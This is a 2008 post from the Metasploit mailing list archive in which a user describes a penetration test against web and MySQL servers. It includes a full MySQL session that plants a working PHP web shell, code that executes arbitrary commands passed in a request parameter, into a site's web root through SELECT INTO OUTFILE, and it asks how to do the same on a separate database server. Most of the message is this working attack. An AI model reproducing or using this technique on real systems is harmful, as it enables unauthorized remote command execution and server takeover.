Metasploit mailing list archives
SOME PENTISTING ROCK I HIT
From: chuksjonia at gmail.com (chuks Jonia)
Date: Mon, 28 Jul 2008 17:42:50 +0000
Thanks Daniel for the reply For the webserver lets say the I.P is 192.168.0.1, has port 3306 and 80 open. i was able to compromise this very fast, due to that pages used at the Care Center server were almost the same, so i could read the config php files. For the next server lets say 192.168.0.2 (though on real world its a public I.P but protected by a netsceen from public), its has webserver running, on 443 and 80, and connects to some Financial companies, but its DB is running on another box, 192.168.0.3, (public i.p too but protected by netscreen too). This db server has 3306 port open but no webserver running, but all the sequel scripts are executing at the second private server. Okey, for the first webserver, due to port 3306 and 80 open it was easy to do this mysql> CREATE TABLE chuks (codetab text); ERROR 1046 (3D000): No database selected mysql> use test Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> CREATE TABLE chuks (codetab text); ERROR 1050 (42S01): Table 'chuks' already exists mysql> DROP TABLE chuks; Query OK, 0 rows affected (0.04 sec) mysql> CREATE TABLE chuks (codetab text); Query OK, 0 rows affected (0.05 sec) mysql> INSERT INTO chuks (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>Exec Shell code :: by chuks</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>'); Query OK, 1 row affected (0.06 sec) mysql> SELECT * INTO OUTFILE '/var/www/html/wap/shell.php' from chuks; Query OK, 1 row affected (0.04 sec) The question is, is there anyway i can write to another server if i select into outfile on that path, and how can i do it. /Chuks
Current thread:
- SOME PENTISTING ROCK I HIT chuks Jonia (Jul 28)
- Message not available
- SOME PENTISTING ROCK I HIT chuks Jonia (Jul 28)
- SOME PENTISTING ROCK I HIT H D Moore (Jul 28)
- SOME PENTISTING ROCK I HIT chuks Jonia (Jul 28)
- Message not available